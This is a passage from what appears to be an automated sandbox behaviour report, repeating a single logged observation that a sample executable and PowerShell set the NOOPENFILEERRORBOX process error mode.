                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
